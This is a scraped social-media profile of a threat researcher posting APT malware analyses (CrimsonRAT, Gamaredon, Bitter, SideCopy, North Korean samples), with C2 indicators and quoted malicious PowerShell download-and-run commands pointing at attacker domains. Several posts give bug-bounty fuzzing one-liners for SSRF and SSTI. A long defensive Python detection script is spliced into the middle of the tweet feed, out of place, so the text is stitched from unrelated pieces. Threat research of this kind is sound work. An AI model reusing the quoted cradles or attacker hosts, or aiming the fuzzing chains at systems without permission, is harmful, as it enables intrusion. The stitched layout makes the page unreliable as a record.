zhixiang hao
@HaoZhixiang
Followers
1K
Following
426
Media
170
Statuses
505
APT threat, Web security, OSINT. Shandong Lanxiang School, China. My sample analysis is just for learning and research.
Central Region, Singapore
Joined November 2021
It is estimated to be an attack targeting India. The content of the malicious DOCM document is the mathematics, science and technology content of the University of Madrid in India. The VBA code will be executed when opened, and the bin file is embedded in the document. CrimsonRAT
1
5
16
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: https://t.co/0NhDIqAr4U and here https://t.co/pWZ8cC7azy) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia. There is VBA macro code: powershell iwr https://karabakhtelekom[.com/api/ekeng-mta.exe -UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
1
24
42
@HaoZhixiang @Kornelij @N_Babajanyan thank you for pointing us to this, we've done some additional research and will release more details soon
cyberhub.am
Threat-researchers at CyberHUB-AM, with the support from Internews’ Martijn Grooten, are tracking a Remote Access Trojan targeting the Armenia International Airports and Armenian State Bodies. The...
1
1
2
@Kornelij @N_Babajanyan Hi, I have found the files downloaded by the dead C2, as well as the ps1 and dll files. download url: https://t.co/ES6y91ZfTO
2
4
12
Web security, bug hunting and sharing of online monitoring methods for subdomain takeover. Can also detect malicious IOC indicators https://t.co/trKR5XeBpt
0
0
1
APT Gamaredon. The content of the document is a forged document of "Electronic Trust Service of the Shastinska Regional Electricity Administration of Ukraine": наказ_в_дпов_дальної особи.doc. http[:]//principles67.vilitord.ru/BUDGET/stoppage56/rejoice/already[.]mkv can't be accessed.
0
6
10
Bitter APT attack sample. The bait is a CHM file; the content is to let everyone report crimes using the Internet. chm->cmd->powershell->schtasks->download jpg->exec command. Guess the collection target in the early stage, and then accurately change the pic.jpg command control.
3
10
24
c2:207.180.194.63 http[:]//createdaliyplan.serveftp.com:8080/user_details
0
0
0
SideCopy APT attacks on the side, China and the United States are currently conducting trade negotiations, using trade between China and the United States as a bait to attack. cmd->mshta->bat->reg->cdrzip.exe->DLL Side-Loading->c2 attack history https://t.co/cSCs6XNK16
1
17
32
The two commands help you complete sensitive information mining, which is suitable for large-scale batch methods.
gau https://t.co/j12Zbrfce8 --subs | cut -d"?" -f1 | grep -E "\.js(on)?$" | tee urls.txt
ffuf -w urls.txt:HFUZZ -u HFUZZ -replay-proxy http://burpip:port
0
1
14
One command to get ssrf mining gau --subs https://t.co/J6ACcAEAOJ | gf ssrf | sort -u | httpx -mc 200 | qsreplace "burpcollaborator" >> ssrfuzzxxx.txt; ffuf -c -w ssrfuzzxxx.txt -u FUZZ happy hunting everyone😄 @0x_rood @Rhynorater @zseano @h1Disclosed @h4x0r_dz @nav1n0x
1
14
61
md5:d74088ca99c5f2834e945e2330729d4c alg.exe 551c155f4fce82bba4cc92e56f1ecb84
1
1
1
Recently, some security personnel released samples of North Korean APT organizations, and took a brief look. chm->wscript->jse->reg->cmd->powershell->download malware PE cmd /c powershell iwr -outf %tmp%\alg.exe https://jutise[.]fun/aypbr & start %tmp%\alg.exe
2
13
35
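A defender-side check for the download cradles quoted in these posts (powershell iwr ... -Outfile into a public or temp directory, launched from a document or CHM viewer, sometimes followed by start in the same command), written as an added example that is not from this account's posts. The Sysmon-style process-creation records, hostnames and domains below are constructed, and the indicator set is an assumption about what such a hunt should key on:

```python
"""Hunt for document-launched PowerShell download cradles in Sysmon
Event ID 1 (process creation) records. Added example; all records are constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal view of a Sysmon process-creation record (constructed)."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Parents that should not normally spawn a shell: Office apps, the CHM viewer, mshta.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "hh.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# Invoke-WebRequest and its Windows PowerShell aliases (iwr, curl, wget).
IWR_RE = re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# PowerShell binds any unambiguous prefix, so -out, -outf, -outfi, ... -outfile all work.
OUTFILE_RE = re.compile(r"-out(?:file|fil|fi|f)?\b\s+([^\s'\"&]+)", re.I)
# Drop locations used by the samples: world-writable and per-user temp paths.
WRITABLE_RE = re.compile(r"(\\users\\public\\|%tmp%|%temp%|\\appdata\\local\\temp\\)", re.I)
# Execution of the dropped file in the same command line (start / schtasks).
EXEC_RE = re.compile(r"\b(?:start|schtasks)\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(ev: ProcEvent) -> list[str]:
    """Return the indicator names that fire on one event, in a fixed order."""
    hits = []
    cl = ev.command_line
    if basename(ev.parent_image) in DOC_PARENTS and basename(ev.image) in SHELLS:
        hits.append("doc_spawns_shell")
    if IWR_RE.search(cl) and URL_RE.search(cl):
        m = OUTFILE_RE.search(cl)
        if m:
            hits.append("web_download_to_file")
            dropped = m.group(1)
            if WRITABLE_RE.search(dropped):
                hits.append("drop_in_writable_dir")
            # Only count execution that appears after the -OutFile argument.
            if dropped.lower().endswith(".exe") and EXEC_RE.search(cl, m.end()):
                hits.append("download_then_execute")
    return hits


def hunt(events: list[ProcEvent], min_hits: int = 2) -> list[tuple[str, str, list[str]]]:
    """Events with at least min_hits indicators; a lone download is not enough."""
    out = []
    for ev in events:
        hits = analyze(ev)
        if len(hits) >= min_hits:
            out.append((ev.host, basename(ev.image), hits))
    return out


# Constructed records: two in the shape of the posted cradles, two benign.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell iwr https://files.example.invalid/api/update.exe "
              r"-UseBasicParsing -OutFile C:\Users\Public\Downloads\update.exe"),
    ProcEvent("ws02", r"C:\Windows\hh.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c powershell iwr -outf %tmp%\svc.exe "
              r"https://cdn.example.invalid/aypbr & start %tmp%\svc.exe"),
    ProcEvent("ws03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\inventory.ps1"),
    ProcEvent("ws04", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Invoke-WebRequest https://intranet.example.invalid/tools/agent.msi "
              r"-OutFile C:\Temp\agent.msi"),
]

if __name__ == "__main__":
    for host, image, hits in hunt(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

The threshold in hunt() is deliberate: an administrator pulling an installer with Invoke-WebRequest trips only web_download_to_file, while the posted chains trip the parent-process and drop-path indicators as well, which is where the signal is.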
Web vulnerability mining: SSTI vulnerability. sudo waybackurls https://t.co/jQ7t8bcgds | grep -Ev "\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$" | qsreplace "ssti{{9*9}}" > fuzz.txt; for url in $(cat fuzz.txt); do python3 https://t.co/1f1XFUaCfA -u "$url"; echo "$url"; done
1
28
65
more parameters: return_path|next_url|checkout_url|retURL|link|file|fallback|callback_url
0
0
2